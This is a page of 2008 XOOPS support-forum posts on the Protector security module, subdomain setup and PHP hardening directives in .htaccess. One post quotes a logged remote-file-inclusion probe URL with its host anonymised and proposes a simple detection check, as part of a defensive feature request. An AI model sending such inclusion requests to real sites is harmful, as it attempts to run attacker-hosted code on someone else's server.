Support Forums - All Posts - XOOPS Web Application System

81

Re: Protector 3.0

2008/5/27 5:15
peterr
Just can't stay away
Posts: 518
Since: 2004/8/5 9

Quote:

vwood wrote:
I had difficulty installing Protector using the instructions at
https://xoops.org/modules/newbb/viewtopic.php?post_id=254269#forumpost254269

If you follow the documentation from done by "MadFish", then you won't have any problems..

PDF version
Open document version
Word version

Quote:

vwood wrote:
I now have a trust path above the web site path.

The trust path should be outside the web root path. If your definition for it is ..


define('XOOPS_TRUST_PATH', '/home/www/xxxxxxxxx');

then it should be something like ..


define('XOOPS_TRUST_PATH', '/home/username/xxxxxxxxx');

HTH

NO to the Microsoft Office format as an ISO standard.
Sign the petition

82

Re: sub-domains for modules

2008/5/10 7:52
peterr
Just can't stay away
Posts: 518
Since: 2004/8/5 9

You may wish to consider modifying mainfile.php , to look for the subdomains. There are various PHP variables that could be used, as they are changed when a subdomain is used. For example ..

If I understand how you have the subdomain setup with Apache, then these PHP variables should be present ..

Quote:

_SERVER["DOCUMENT_ROOT"] /home/username/public_html/modules/sub
_SERVER["HTTP_HOST"] sub.domain.com
_SERVER["SERVER_NAME"] sub.domain.com
_ENV["DOCUMENT_ROOT"] /home/username/public_html/modules/sub
_ENV["HTTP_HOST"] sub.domain.com
_ENV["SERVER_NAME"] sub.domain.com

Some possible mainfile.php changes ..


if $_SERVER["HTTP_HOST"] == sub.domain.com {

    define('XOOPS_ROOT_PATH', '/home/username/public_html/modules/sub');

    define('XOOPS_URL', 'http://sub.domain.com');



} else {

    define('XOOPS_ROOT_PATH', '/home/username/public_html');

    define('XOOPS_URL', 'http://domain.com');

}

but, no doubt you have already tried that, or there are other implications ??

NO to the Microsoft Office format as an ISO standard.
Sign the petition

83

Re: sub-domains for modules

2008/5/10 6:52
peterr
Just can't stay away
Posts: 518
Since: 2004/8/5 9

Quote:

tzvook wrote:
I'm trying to lead my subdomains into XOOPS modules, but when using the "sub" adress ( IE: "the-module.my-site.com") all I get is this:
Selected module does not exist!

though the adress is leading to "my-site.com/modules/the-module"

It seems to be going against the standard 'structure' of sub-domains ??

If there is a subdomain calledhttp://the-module.my-site.com , then the web root ishttp://my-site.com , and the path structure will be something like ..

/home/username/public_html/ for web root
/home/username/public_html/the-module/ for subdomain

and the path 'modules', for std XOOPS sites will be ..

/home/username/public_html/modules/

which is the same level as the subdomain, unfortunately.

If you can (somehow) point your subdomain to ..

/home/username/public_html/modules/the-module/

that might work, but that is not how Apache, etc, views a subdomain.

NO to the Microsoft Office format as an ISO standard.
Sign the petition

84

Re: Protector - feature request

2008/5/9 12:42
peterr
Just can't stay away
Posts: 518
Since: 2004/8/5 9

Thanks, I have PM'd the author of the Protector documentation, who seems to be a regular poster on the Peak website.

NO to the Microsoft Office format as an ISO standard.
Sign the petition

85

Protector - feature request

2008/5/9 12:09
peterr
Just can't stay away
Posts: 518
Since: 2004/8/5 9

Have been using Protector for a while, and would like to see it "trap" any HTTP request, that is obviously trying to parse a script from a remote site. These do not always result in a 403 or a 404 either, depending upon server security and configuration.

The type of requests are of the format:

Quote:

208.113.196.15 - - [09/May/2008:04:54:57 +1000] "GET /modules/xhld0/index.php?_REQUEST=&_REQUEST%5boption%5d=com_zoom&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://example.com/modules/test.txt??? HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"

(domain name of remote url changed in the above, for obvious reasons).

returns a 302, and often other attempts at remote script parsing, return a 200, so XOOPS thinks that "all is well", despite the fact that Protector is installed.

I don't think the 'blanket approach' of setting "allow_url_fopen" value to off is suitable for all sites. Turning this option off is recommended when using Protector, however server setup/config., and especially PHP version, has a bearing on whether or not this setting should really be off.

See these discussions:

http://foundationphp.com/phpsolutions/updates.php
http://www.webmasterworld.com/forum88/10940.htm

Determining if the string 'http' was being parsed, could be something like ..


$pos = strpos(strtolower($_SERVER['REQUEST_URI']), 'http:');

As the version of PHP has some bearing on the need to have the setting "allow_url_fopen" value to off, the PHP function phpversion() could be utilised.

My 0.001 cents worth anyway.

NO to the Microsoft Office format as an ISO standard.
Sign the petition

86

Re: XOOPS security and php settings

2008/5/3 7:17
peterr
Just can't stay away
Posts: 518
Since: 2004/8/5 9

Quote:

hervet wrote:
It seems ok for me.
Don't forget to secure your database too.

Thanks. Yes, the db is okay, I use Protector.

It was going to be way too much to define the php values in a php.ini, because we would need one in every path that had, at least an 'include' or 'require' in the php code. I did a quick glance, and counted no less than 78 paths that would need a modified php file, ...... no thanks, what a maintenance nightmare.

Fortunately, the server admin person was kind enough to modify the server wide php settings for me, as _most_ of those required by XOOPS and Protector are set correctly anyway.

The only one that isn't set (off) is allow_url_fopen , however the point raised in the first post is an issue, that is, the real need to have this set off. Also, server security is such that people who are trying exploits on the site, and trying to pass a remote file (by include "http" and the filename in the uri), are getting nowhere at all, they get a 403 or a 404.

In the process of reading some docs on suPHP, we found out that in php 5.3 , the use of .htaccess will again be available, at least, that's the way I read it.

NO to the Microsoft Office format as an ISO standard.
Sign the petition

87

Re: BIG thanks to Gijoe

2008/5/3 6:58
peterr
Just can't stay away
Posts: 518
Since: 2004/8/5 9

It would be good if Protector was 'part' of the XOOPS core.

I installed it after someone tried an SQL injection. It's a great module. Also, I have found server security setup has a big part to play in attempted exploits; a lot depends on how tight security is, if the browser is returned a 403 or 404 on uri's that have "http" in them (trying to pass a remote file).

Yes, Gijoe should be thanked by many people.

NO to the Microsoft Office format as an ISO standard.
Sign the petition

88

Re: Apache2, php5 and internal server errors

2008/4/24 13:17
peterr
Just can't stay away
Posts: 518
Since: 2004/8/5 9

Or, another alternative ..

In the .htaccess file of the web root path ..


suPHP_ConfigPath /home/username

Then create a file /home/username/php.ini (take a copy of the currently used php.ini configuration file).

Now you have a local php.ini file where you can set your directives.

Or, this should work also ..


suPHP_ConfigPath /home/username/public_html

<Files php.ini>

order allow,deny

deny from all

</Files>

and your php.ini is placed in the web root path.

NO to the Microsoft Office format as an ISO standard.
Sign the petition

89

XOOPS security and php settings

2008/4/24 1:29
peterr
Just can't stay away
Posts: 518
Since: 2004/8/5 9

The server environment is

Quote:

Apache version 2.0.63
PERL version 5.8.8
PHP version 5.2.5
MySQL version 5.0.45-community

There may be some official XOOPS guidlines on security, however I could not find it. In particular, what php settings are recommended ?

This is what is currently used in the .htaccess of an XOOPS site.


# XOOPS security measures

php_flag session.use_only_cookies on

php_flag session.use_trans_sid off

# Protector module

php_flag register_globals off

php_flag allow_url_fopen off

# php errors

php_value display_errors 0

php_value log_errors 1

php_value error_log ../phperrorspathname/phperrorlogname.txt

Please advise of any changes/additions. Please keep in mind, that since PHP 5.1.0 , the 'need' for alow_url-fopen to be "off" may be redundant, by the addition of a new directive, called allow_url_include - (seehttp://www.webmasterworld.com/forum88/10940.htm)

Some default configuration values athttp://www.php.net/manual/en/filesystem.configuration.php

NO to the Microsoft Office format as an ISO standard.
Sign the petition

90

Re: Apache2, php5 and internal server errors

2008/4/24 1:01
peterr
Just can't stay away
Posts: 518
Since: 2004/8/5 9

I have since found out that suPHP is running, and there is a method to use .htaccess , and therefore, no doubt, add the php_flag settings.

The following from suPHP - FAQ ..

Quote:

Can I use the php_value directives in .htaccess files with suPHP?

suPHP does not support the php_value/php_admin_value directive known by mod_php to parse configuration options to scripts for certain virtual hosts or directories. However there is a PECL extension named htscanner that can be used with PHP CGI (called by suPHP) to parse such options being present in .htaccess files. Be sure to take a look at the README file provided with the htscanner distribution on how to make Apache ignore the php_value directives in .htaccess files instead of throwing an error.

NO to the Microsoft Office format as an ISO standard.
Sign the petition

Stats
Goal:	$100.00
Due Date:	May 31
Gross Amount:	$0.00
Net Balance:	$0.00
Left to go:	$100.00

Forum Index

Re: Protector 3.0

Re: sub-domains for modules

Re: sub-domains for modules

Re: Protector - feature request

Protector - feature request

Re: XOOPS security and php settings

Re: BIG thanks to Gijoe

Re: Apache2, php5 and internal server errors

XOOPS security and php settings

Re: Apache2, php5 and internal server errors

Login

Search

Recent Posts

Re: Rebuilding and Updating a 20 years old Xoops Website from 2.0.18? to 2.5.11

Rebuilding and Updating a 20 years old Xoops Website from 2.0.18? to 2.5.11

Re: NewBB v 5.1.0 b 6

Re: NewBB v 5.1.0 b 6

NewBB v 5.1.0 b 6

Re: XOOPS 2.5.11 search user is not working

Re: oledrion

Re: oledrion

Re: oledrion

Re: oledrion

Who's Online

Donat-O-Meter

Latest GitHub Commits

{{ record.sha.slice(0, 7) }} - {{ record.commit.message | truncate }}